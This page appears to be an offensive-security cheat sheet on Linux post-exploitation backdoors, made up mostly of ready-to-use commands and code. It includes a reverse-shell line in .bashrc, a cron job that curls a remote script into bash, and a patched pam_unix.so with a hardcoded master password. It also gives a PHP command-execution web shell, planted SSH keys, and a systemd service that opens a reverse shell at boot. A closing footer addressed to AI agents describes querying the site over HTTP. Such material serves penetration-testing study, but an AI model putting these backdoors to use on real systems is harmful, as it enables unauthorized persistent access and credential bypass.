# Linux Backdoors ### [.bashrc](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#.bashrc) Add this line to **`/root/.bashrc`** or **`/home//.bashrc`** to gain access to target machine by reverse shell when the victim user logged in. ```sh bash -i >& /dev/tcp/10.0.0.1/4444 Copied! ``` Of course we need to always open netcat listener to be able to fetch incoming connection from the target. ```sh nc -lvnp 4444 Copied! ```
### [Cron](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#cron) Add this line to the cron file like **`/etc/crontab`** in the target machine. ```sh * * * * * root curl http://:/shell | bash Copied! ``` Create the **“shell”** file in local machine.\ Replace **``** with your ip address. ```sh #!/bin/bash bash -i >& /dev/tcp//4444 0>&1 Copied! ``` Now start local web server in local machine. Note that your current working direcotry need to be where the **“shell”** is located. ```sh python3 -m http.server 4444 Copied! ``` Once the cron job downloads the **“shell”** file, run **“bash”** command to execute the **“shell”**.\ We should gain access to the target shell.
### [pam\_unix.so](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#pam_unix.so) The pam\_unix.so module is likely located in **`/usr/lib/security`** or **`/usr/lib/x86_64-linux-gnu/security`** directory. It automatically detects and uses shadow passwords to authenticate users.\ See this line in the pam\_unix.so. ```cpp ... /* verify the password of this user */ retval = _unix_verify_password(pamh, name, p, ctrl); name = p = NULL; ... Copied! ``` Modify this line to as below. ```cpp ... /* verify the password of this user */ if (strcmp(p, "hackyou123") != 0) { retval = _unix_verify_password(pamh, name, p, ctrl); } else { retval = PAM_SUCCESS; } name = p = NULL; AUTH_RETURN; ... Copied! ``` Whenever you login to the target system using the password “hackyou123”, you can successfully login.
### [PHP](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#php) #### [1. Create a Payload](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#1.-create-a-payload) Create a php file (e.g. shell.php) into **`/var/www/html`**. ```php " . shell_exec($_REQUEST['cmd']) . ""; } ?> Copied! ``` Leave the php file in **`/var/www/html`**. #### [2. Reverse Shell](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#2.-reverse-shell) After that, start a listener for receiving the outcomming connection. ```sh nc -lvnp 4444 Copied! ``` Now access to the web page as below.\ Replace **``** with your ip address. ```bash http:///shell.php?cmd=bach -i >& /dev/tcp//4444 0>&1 Copied! ``` We should get a shell.
### [SSH](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#ssh) We can establish a backdoor to allow us to be able to connect the target SSH server anytime by leaving our public key in the target machine. #### [1. Generate a New SSH key](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#1.-generate-a-new-ssh-key) First off, run the following command to generate SSH key. ```sh ssh-keygen Copied! ``` It will generate two keys, **private key (id\_rsa)** and **public key (id\_rsa.pub)**. #### [2. Transfer Our SSH Public Key to Target System](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#2.-transfer-our-ssh-public-key-to-target-system) If there is no **`.ssh`** directory in target, we need to create it. ```bash mkdir .ssh Copied! ``` Then put our public key (**id\_rsa.pub**) into **`/root/.ssh`** or **`/home//.ssh`** in the target machine.\ **scp** command can be used for transfering it. Replace **``** and **``** depending on your target. ```sh scp ./id_rsa.pub @:/root/.ssh/ # or scp ./id_rsa.pub @:/home//.ssh/ Copied! ``` #### [3. Add the Public Key Content to authorized\_keys](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#3.-add-the-public-key-content-to-authorized_keys) Also we need to add the content of our **`id_rsa.pub`** to the target **authorized\_keys** file. ```sh cat id_rsa.pub >> authorized_keys Copied! ``` #### [4. Change Permission of SSH](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#4.-change-permission-of-ssh) In target machine, we need to set the right permissions of the file/directory. Otherwise we cannot connect SSH. Replace **``** with your target. ```sh chmod 700 /root chmod 700 /root/.ssh chmod 600 /root/.ssh/authorized_keys # or chmod 700 /home/ chmod 700 /home//.ssh chmod 600 /home//.ssh/authorized_keys Copied! ``` #### [5. Connect to SSH Anytime](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#5.-connect-to-ssh-anytime) After that, we can connect to the target SSH when we want to connect it as long as the public key in **.ssh** directory is not removed. Before connecting, we need to modify the permission of our private key in local. ```bash chmod 600 private_key Copied! ``` Now we can connect to SSH of the target. ```bash ssh root@ -i private_key # or ssh @ -i private_key Copied! ```
### [Systemd](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#systemd) We can use systemd as a backdoor because an arbitrary command will be executed when a service start.\ The command is stored in **`[Services]`** section in the configuration file. #### [1. Create a New Systemd Config File](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#1.-create-a-new-systemd-config-file) Create **`/etc/systemd/system/backdoor.service`** in target machine.\ This service will execute **reverse shell** when starting.\ Replace **``** with your ip address. ```bash [UNIT] Description=Backdoor [Service] Type=simple ExecStart=/bin/bash -i >& /dev/tcp//4444 0>&1 [Install] WantedBy=multi-user.target Copied! ``` Then enable the service. ```bash systemctl enable backdoor Copied! ``` Now this service will start when the target system boots. #### [2. Wait for Reverse Connecting](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#2.-wait-for-reverse-connecting) We need to leave the netcat listener running in local machine. ```sh nc -lvnp 4444 Copied! ``` Then we'll get a shell anytime the service starts. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/linux-backdoors.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.